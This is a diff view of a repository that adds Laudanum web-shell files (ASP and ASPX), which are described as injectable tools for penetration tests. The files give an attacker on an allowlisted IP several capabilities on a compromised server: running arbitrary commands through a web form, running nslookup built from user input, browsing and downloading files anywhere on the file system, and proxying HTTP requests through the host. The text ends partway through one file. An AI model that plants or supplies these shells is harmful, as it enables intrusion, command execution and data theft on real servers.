-------------------------------------------------------------------------------
I. ABOUT
_____________________________________
Laudanum is a collection of injectable files, designed to be used in a pentest
when upload vulnerabilities, administrative interfaces, and SQL injection flaws
are found. These files are written in multiple languages for different
environments. They provide functionality such as shell, DNS query, LDAP
retrieval and others.

153
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/asp/dns.asp Executable file
View file

@ -0,0 +1,153 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' IPs are enterable as individual addresses TODO: add CIDR support
Dim allowedIPs
Dim allowed
Dim qtypes
Dim qtype
Dim validtype
Dim query
Dim i
Dim command
allowedIPs = "192.168.0.1,127.0.0.1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
Exit For
end if
next
' send a 404 if not the allowed IP
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
%>
<html>
<head>
<title>Laudanum ASP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<%
' dns query types as defined as by windows nslookup
qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
qtype = UCase(Request.Form("type"))
' see if the query type is valid, if it isn't then set it.
validtype = 0
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
validtype = 1
Exit For
end if
next
if validtype = 0 then qtype = "ANY"
%>
<form name="dns" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<%
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
else
Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
end if
next
%>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<%
' get the query
query = trim(Request.Form("query"))
' the query must be sanitized a bit to try to make sure the shell doesn't hang
query = replace(query, " ", "")
query = replace(query, ";", "")
if len(query) > 0 then
command = "nslookup -type=" & qtype & " " & query
Set objWShell = Server.CreateObject("WScript.Shell")
Set objCmd = objWShell.Exec(command)
strPResult = objCmd.StdOut.Readall()
set objCmd = nothing: Set objWShell = nothing
%><pre><%
Response.Write command & "<br>"
Response.Write replace(strPResult,vbCrLf,"<br>")
%></pre><%
end if
%>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

179
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/asp/file.asp Executable file
View file

@ -0,0 +1,179 @@
<%@Language="VBScript"%>
<%Option Explicit%>
<%Response.Buffer = True%>
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' Define variables
Dim allowedIPs
Dim allowed
Dim filepath
Dim file
Dim stream
Dim path
Dim i
Dim fso
Dim folder
Dim list
Dim temppath
' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
exit for
end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
' create file object for use everywhere
set fso = CreateObject("Scripting.FileSystemObject")
' download a file if selected
filepath = trim(Request.QueryString("file"))
'validate file
if len(filepath) > 0 then
if fso.FileExists(filepath) then
'valid file
Set file = fso.GetFile(filepath)
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
'Response.AddHeader "Content-Length", file.Size
Response.ContentType = "application/octet-stream"
set stream = Server.CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
Response.Charset = "UTF-8"
stream.LoadFromFile(file.Path)
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
Response.BinaryWrite(stream.Read)
stream.Close
set stream = Nothing
set file = Nothing
Response.End
end if
end if
' begin rendering the page
%>
<html>
<head>
<title>Laudanum ASP File Browser</title>
</head>
<body>
<h1>Laudanum File Browser 0.1</h1>
<%
' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic
path = trim(Request.QueryString("path"))
if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\"))
elseif not fso.FolderExists(path) then
path = fso.GetFolder(Server.MapPath("\"))
end if
set folder = fso.GetFolder(path)
' Special locations, webroot and drives
%><b>Other Locations:</b> <%
for each i in fso.Drives
if i.IsReady then
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
end if
next
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
' Information on folder
%><h2>Listing of: <%
list = split(folder.path, "\")
temppath = ""
for each i in list
temppath = temppath & i & "\"
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
next
%></h2><%
' build table for listing
%><table>
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
' Parent Path if it exists
if not folder.IsRootFolder then
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
end if
' Get the folders
set list = folder.SubFolders
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
next
' Get the files
set list = folder.Files
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
next
' all done
%>
</table>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

454
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/asp/proxy.asp Executable file
View file

@ -0,0 +1,454 @@
<%@Language="VBScript"%>
<%Option Explicit%>
<%Response.Buffer = True%>
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' Define variables
Dim allowedIPs
Dim allowed
Dim i
Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
Dim urltemp
Dim urlscheme
Dim urlhost
Dim urlport
Dim urlpath
Dim urlfile
Dim urlquery
Dim http
Dim method
Dim contenttype
Dim stream
Dim regex
Dim body
Dim params
function err_handler()
%>
<html>
<head>
<title>Laudanum ASP Proxy</title>
</head>
<body>
<h1>Fatal Error!</h1>
<%=Err.Number%><br/>
<%=Err.Message%><br/>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html><%
end function
function CleanQueryString
' removes laudurl from the querystring
Dim i
Dim j
Dim s
Dim key
Dim q
if len(request.querystring) = 0 then
CleanQueryString = ""
exit function
end if
' build the request parameters
for i = 1 to request.querystring.count
key = request.querystring.key(i)
'response.write "<br/>key:" & key
if key = "laudurl" then
' if the key is laudurl, we need check if there is a ? in the string since
' it may have its own query string that doesn't get parsed properly.
s = split(request.querystring("laudurl"), "?")
if ubound(s) > lbound(s) then
' laudurl contains a ?, it must be manually parsed
key = left(s(1), instr(s(1), "=") - 1)
q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
end if
else
for j = 1 to request.querystring(key).count
'response.write "<br/> -value:" & request.querystring(key)(j)
q = q & "&" & key & "=" & request.querystring(key)(j)
next
end if
next
if len(q) > 0 then
CleanQueryString = "?" & mid(q, 2)
else
CleanQueryString = ""
end if
end function
function CleanFormValues()
Dim r
Set r = New RegExp
r.IgnoreCase = true
r.Global = true
' remove the laudurl paramater
r.Pattern = "laudurl=[^&]+($|&)"
CleanFormValues = r.Replace(request.form, "")
Set r = nothing
end function
sub ParseUrl()
' parses the url into the global variables
Dim urltemp
Dim url
'get the url, it may be in the querystring for a get or from a form in a post
url = Request.QueryString("laudurl")
if url = "" then
url = Request.Form("laudurl")
end if
if url = "" then
urlscheme = ""
urlhost = ""
urlport = ""
urlpath = ""
urlfile = ""
urlquery = ""
exit sub
end if
' Parse the url and break it into its components
' this is done so it can be used to rewrite the page
' ensure the url has a scheme, if it doesn't then assume http
if instr(url,"://") = 0 then url = "http://" + url
' Get the scheme
urlscheme = split(url, "://")(0) & "://"
' urltemp is used to hold the remainder of the url as each portion is parsed
urltemp = mid(url, len(urlscheme) + 1)
'get the host
if instr(urltemp, "/") = 0 then
' there is no path so all that is left is the host
urlhost = urltemp
urlport = ""
urlpath = "/"
urlfile = ""
urlport = ""
else
' there is more that just the hostname remaining
urlhost = left(urltemp, instr(urltemp, "/") - 1)
urltemp = mid(urltemp, len(urlhost) + 1)
' is there a port
if instr(urlhost, ":") = 0 then
' no port
urlport = ""
else
' there is a port
arr = split(urlhost, ":")
urlhost = arr(0)
urlport = ":" & arr(1)
end if
' all that is left is the path and the query
' is there a query?
if instr(urltemp, "?") = 0 then
' no query
urlpath = urltemp
'urlquery = ""
else
'Response.Write "<br><br>" & urltemp & "<br><br>"
urlpath = left(urltemp, instr(urltemp, "?") - 1)
'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
end if
if right(urlpath, 1) = "/" then
urlfile = ""
else
' we need to get the path and the file
urltemp = split(urlpath, "/")
urlfile = urltemp(ubound(urltemp))
urlpath = left(urlpath, len(urlpath) - len(urlfile))
end if
end if
urlquery = CleanQueryString
'response.write "<br>scheme: " & urlscheme
'response.write "<br>host: " & urlhost
'response.write "<br>port: " & urlport
'response.write "<br>path: " & urlpath
'response.write "<br>file: " & urlfile
'response.write "<br>query: " & urlquery
'response.write "<br>full: " & FullUrl()
'response.end
end sub
function FullUrl()
FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
end function
sub RewriteHeaders()
Dim i
Dim header
Dim headervalue
Dim regexdomain
Dim regexpath
' setup a regular expression to clean the cookie's domain and path
Set regexdomain = New RegExp
regexdomain.IgnoreCase = true
regexdomain.Global = true
' rewrite images and links - absolute reference
regexdomain.Pattern = "domain=[\S]+"
Set regexpath = New RegExp
regexpath.IgnoreCase = true
regexpath.Global = true
' rewrite images and links - absolute reference
regexpath.Pattern = "path=[\S]+"
' go through each header
for each i in Split(http.getAllResponseHeaders, vbLf)
' Break on the \x0a and remove the \x0d if it exists
i = Replace(i, vbCr, "")
' make sure it is a header and value
if instr(i, ":") > 0 then
' break the response headers into header and value
header = trim(Left(i, instr(i, ":") - 1))
header = replace(header, "_", "-")
headervalue = trim(Right(i, len(i) - instr(i, ":")))
' don't add these two header types since they are handled automatically
if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
if lcase(header) = "set-cookie" then
' strip the domain from the cookie
headervalue = regexdomain.replace(headervalue, "")
' strip the path from the cookie
headervalue = regexpath.replace(headervalue, "")
headervalue = trim(headervalue)
end if
response.AddHeader header, headervalue
end if
end if
next
Set regexdomain = nothing
Set regexpath = nothing
end sub
' TODO: Add authentication support so it will work behind a proxy
' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
' TODO: change this to 0 for production, it is 1 for testing
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
exit for
end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
'initialize variables
Set http = nothing
Set regex = nothing
Set stream = nothing
' Define Constants
const useMSXML2 = 0
const chunkSize = 1048576 ' 1MB
' parse the url into its parts
ParseUrl()
' check if there is a valid url
if len(FullUrl) = 0 then
' no url to proxy, give `em the boring default page
' Default layout of the page
' First thing you get when you hit the page without giving it a URL
%>
<html>
<head>
<title>Laudanum ASP Proxy</title>
<script type="text/javascript">
function init() {
document.proxy.url.focus();
}
</script>
</head>
<body onload="init()">
<h1>Laudanum ASP Proxy</h1>
<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="laudurl" size="70">
<input type="submit" value="Submit">
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html> <%
Response.End()
end if
' Let's get our Proxy on!!!
' define the request type
if useMSXML2 = 1 then
Set http = Server.CreateObject("MSXML2.XMLHTTP")
else
Set http = Server.CreateObject("Microsoft.XMLHTTP")
end if
' get the request type
method = Request.ServerVariables("REQUEST_METHOD")
' setup the request, false means don't send it yet
http.Open method, FullUrl, False
' send the request
if method = "POST" then
params = CleanFormValues
http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
http.setRequestHeader "Content-length", len(params)
http.setRequestHeader "Connection", "close"
http.Send(params)
else
http.Send
end if
' Replace the normal headers with the ones from the response
Response.Clear
contenttype = http.getResponseHeader("Content-Type")
Response.ContentType = contenttype
' rewrite the headers. Takes headers and passes them to new request
RewriteHeaders()
' how to respond? is it text or is it something else?
if lcase(left(contenttype, 4)) = "text" then
' response is text, so we need to rewrite it, but that's later
' do the rewriting
body = http.responseText
Set regex = New RegExp
regex.IgnoreCase = true
regex.Global = true
' rewrite images and links - absolute reference
s = urlscheme & urlhost & urlport
regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
' rewrite images and links - full reference
regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3")
' rewrite images and links - absolute reference
s = urlscheme & urlhost & urlport & urlpath
regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
' rewrite forms - absolute reference
s = urlscheme & urlhost & urlport
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
' rewrite forms - full reference
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">")
' rewrite forms - absolute reference
s = urlscheme & urlhost & urlport & urlpath
regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
Response.Write(body)
Set regex = nothing
else
' some sort of binary response, so stream it
Set stream = nothing
Set stream = Server.CreateObject("ADODB.Stream")
stream.Type = 1 'Binary
stream.Open
stream.Write http.responseBody
stream.Position = 0
For i = 0 to stream.Size \ chunkSize
Response.BinaryWrite(stream.Read(chunkSize))
next
Set stream = nothing
end if
Set http = nothing
Response.End
:HandleError
err_handler
%>

83
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/asp/shell.asp Executable file
View file

@ -0,0 +1,83 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

144
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/aspx/dns.aspx Executable file
View file

@ -0,0 +1,144 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
{
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
{
if (s == qType)
{
validType = true;
break;
}
}
if (!validType)
qType = "Any";
}
if (Request.Form["query"] != null)
{
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
{
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
}
}
}
</script>
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
<%
foreach (string s in qtypes)
{
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
}
%>
</select>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</body>
</html>

154
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/aspx/file.aspx Executable file
View file

@ -0,0 +1,154 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
{
foreach (string ip in allowedIPs)
{
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{
allowed = true;
}
}
if (!allowed)
{
die();
}
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
{
if (System.IO.File.Exists(file))
{
writefile();
}
}
}
void writefile()
{
Response.ClearContent();
Response.Clear();
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file);
Response.Flush();
Response.End();
}
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
</script>
<html>
<head></head>
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
{
if (b.Length > 0)
{
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");
}
}
%>
<table>
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
<%
try
{
if (System.IO.Directory.Exists(dir))
{
string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
}
}
else
{
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
Response.End();
}
}
catch (System.UnauthorizedAccessException ex)
{
